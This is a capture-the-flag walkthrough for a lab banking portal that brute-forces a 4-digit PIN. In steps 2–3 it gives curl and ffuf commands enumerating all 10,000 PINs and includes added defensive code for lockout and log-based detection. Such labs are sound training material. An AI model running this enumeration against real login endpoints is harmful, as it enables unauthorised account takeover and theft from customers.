HACKR.GG
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

Online Banking Login — FirstBank

Broken Authentication · Brute Force / PIN Enumeration
Difficulty: Easy
Vuln class: Brute Force / PIN Enumeration
Steps: 4
// Objective
Brute-force a 4-digit PIN for FirstBank's online banking login. The target customer is known (account number provided) — enumerate all 10,000 possible PINs.
// Tools required
ffuf, curl, python3
// Step-by-step walkthrough
1. Understand the login mechanism
The FirstBank portal authenticates with an account number and a 4-digit PIN. Intercept a login attempt to see the request format.
Command / Input
POST /api/auth/login
Content-Type: application/json

{"account":"10042871","pin":"0000"}
Output
{"error":"Invalid PIN"}
2. Confirm no lockout policy
Send 20 failed attempts back-to-back. If the account stays unlocked, the endpoint is fully brute-forceable.
Command / Input
# Five back-to-back attempts against the same account; the JSON body is escaped
# so the shell passes the quotes through, and the host matches the lab target used below.
for pin in 0000 0001 0002 0003 0004; do
  curl -s -X POST http://target.lab/api/auth/login \
    -H "Content-Type: application/json" \
    -d "{\"account\":\"10042871\",\"pin\":\"$pin\"}"
  echo
done
Output
{"error":"Invalid PIN"} x5 — no lockout triggered.
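The control this step probes for, shown from the defending side. This is an added example and not FirstBank's or hackr.gg's code: a hypothetical login backend with a per-account failed-attempt counter, a temporary lockout, a constant-time PIN comparison, and an identical response for unknown accounts and wrong PINs. The account number and PIN reuse the walkthrough's sample values (10042871 / 4291); the thresholds (5 failures, 15-minute lock) are assumptions. The last function turns the policy into the number that matters for this lab: how long the 10,000-PIN space takes to exhaust once each lockout window only permits a handful of guesses.

```python
import hashlib
import hmac
import os
import time

PBKDF2_ROUNDS = 100_000
DUMMY_SALT = b"\x00" * 16   # used so unknown accounts cost the same time as real ones


def hash_pin(pin: str, salt: bytes) -> bytes:
    """Salted PBKDF2 of the PIN so a leaked table does not expose PINs directly."""
    return hashlib.pbkdf2_hmac("sha256", pin.encode(), salt, PBKDF2_ROUNDS)


class LoginService:
    """Hypothetical login backend (example code, not FirstBank's)."""

    def __init__(self, max_failures: int = 5, lockout_seconds: int = 900, clock=time.time):
        self.max_failures = max_failures
        self.lockout_seconds = lockout_seconds
        self.clock = clock            # injectable so a test can advance time
        self._accounts = {}           # account -> (salt, pin_hash)
        self._failures = {}           # account -> consecutive failure count
        self._locked_until = {}       # account -> unix time the lock expires

    def register(self, account: str, pin: str) -> None:
        salt = os.urandom(16)
        self._accounts[account] = (salt, hash_pin(pin, salt))

    def is_locked(self, account: str) -> bool:
        return self._locked_until.get(account, 0.0) > self.clock()

    def login(self, account: str, pin: str) -> dict:
        if self.is_locked(account):
            # Reject before evaluating the PIN: a correct guess during lockout
            # must not produce a different response than a wrong one.
            return {"error": "Account temporarily locked"}
        record = self._accounts.get(account)
        if record is None:
            hash_pin(pin, DUMMY_SALT)         # equalise timing for unknown accounts
        else:
            salt, stored = record
            if hmac.compare_digest(hash_pin(pin, salt), stored):
                self._failures.pop(account, None)
                return {"ok": True}
        # Unknown account and wrong PIN share one response and one counter,
        # so neither the account number nor the PIN is enumerable through this path.
        self._record_failure(account)
        return {"error": "Invalid PIN"}

    def _record_failure(self, account: str) -> None:
        count = self._failures.get(account, 0) + 1
        self._failures[account] = count
        if count >= self.max_failures:
            self._locked_until[account] = self.clock() + self.lockout_seconds
            self._failures[account] = 0


def worst_case_enumeration_seconds(max_failures: int, lockout_seconds: int,
                                   keyspace: int = 10_000) -> int:
    """Seconds needed to try every PIN when each lockout window permits
    max_failures guesses. With 5 guesses per 15 minutes the walkthrough's
    under-a-minute enumeration becomes roughly 21 days per account."""
    windows = -(-keyspace // max_failures)     # ceiling division
    return windows * lockout_seconds
```

With these settings the burst the step sends locks the account on the fifth failure, and the correct PIN is refused until the window expires; the lab endpoint, by contrast, answers every attempt with the same `Invalid PIN` body. A lockout keyed only on the account also needs per-source rate limiting in front of it, otherwise the same control becomes a denial-of-service lever against legitimate customers.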
3. Generate and run a full PIN wordlist
A 4-digit PIN has 10,000 possibilities (0000–9999). Generate the list with Python and pipe it into ffuf.
Command / Input
python3 -c "print('\n'.join(f'{i:04d}' for i in range(10000)))" > pins.txt
ffuf -u http://target.lab/api/auth/login \
  -X POST \
  -H "Content-Type: application/json" \
  -d '{"account":"10042871","pin":"FUZZ"}' \
  -w pins.txt \
  -fs 23
Output
[Status: 200, Size: 89] 4291
The valid PIN is 4291. With no rate limiting, this takes under a minute.
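What this run looks like in the portal's logs, and how to catch it. This is an added detection example, not part of the walkthrough: the log format (`timestamp src=... account=... result=ok|fail`), the sample lines and the thresholds (10 failures inside 60 seconds) are all constructed for the example; a real portal's access log needs its own parser. The detector raises one alert per source/account pair when failed logins exceed the threshold in a sliding window, and a second, higher-severity alert when a success follows such a burst, which is exactly the pattern the ffuf run above leaves behind.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timezone

# Constructed log format for this example; replace LINE_RE with the real portal's.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) account=(?P<account>\d+) result=(?P<result>ok|fail)$"
)

# Constructed sample: one customer who mistypes once, and one source that hammers
# the walkthrough's account with a burst of failures and then logs in.
SAMPLE_LOG = [
    "2024-05-01T10:00:00Z src=198.51.100.7 account=10055123 result=fail",
    "2024-05-01T10:00:04Z src=198.51.100.7 account=10055123 result=ok",
] + [
    f"2024-05-01T10:00:{10 + i // 4:02d}Z src=203.0.113.5 account=10042871 result=fail"
    for i in range(12)
] + [
    "2024-05-01T10:00:13Z src=203.0.113.5 account=10042871 result=ok",
]


def parse(line: str):
    """Return (timestamp, src, account, result) or None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return ts, m["src"], m["account"], m["result"]


def detect_pin_bruteforce(lines, threshold: int = 10, window_seconds: int = 60):
    """Sliding-window count of failed logins per (src, account).

    Emits 'pin_bruteforce' once when the count reaches `threshold` inside the window,
    and 'success_after_bruteforce' for any later success from the same pair: the
    second alert is the one that should page someone, because it means the guess worked.
    """
    recent = defaultdict(deque)   # (src, account) -> timestamps of recent failures
    flagged = set()
    alerts = []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ts, src, account, result = rec
        key = (src, account)
        q = recent[key]
        while q and (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()               # drop failures that fell out of the window
        if result == "fail":
            q.append(ts)
            if len(q) >= threshold and key not in flagged:
                flagged.add(key)
                alerts.append({"type": "pin_bruteforce", "src": src, "account": account,
                               "failures": len(q), "at": ts.isoformat()})
        elif key in flagged:
            alerts.append({"type": "success_after_bruteforce", "src": src,
                           "account": account, "at": ts.isoformat()})
    return alerts


if __name__ == "__main__":
    for alert in detect_pin_bruteforce(SAMPLE_LOG):
        print(alert)
```

Keying on the source address alone misses an attacker who rotates through proxies, and keying on the account alone is noisy for shared or mistyped accounts; the pair is a reasonable first cut, with a second, per-account-only rule at a higher threshold to cover distributed guessing.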
4. Log in and retrieve the flag
Enter the discovered PIN in the banking portal to authenticate.
Command / Input
Account: 10042871
PIN: 4291
Output
Login successful. Welcome, John Smith. Flag: HackrGG{f1rstb4nk_br0t3f0rc3d_p1n}
// Flag
Flag value
HackrGG{f1rstb4nk_br0t3f0rc3d_p1n}
Displayed on the account dashboard after successful PIN brute-force.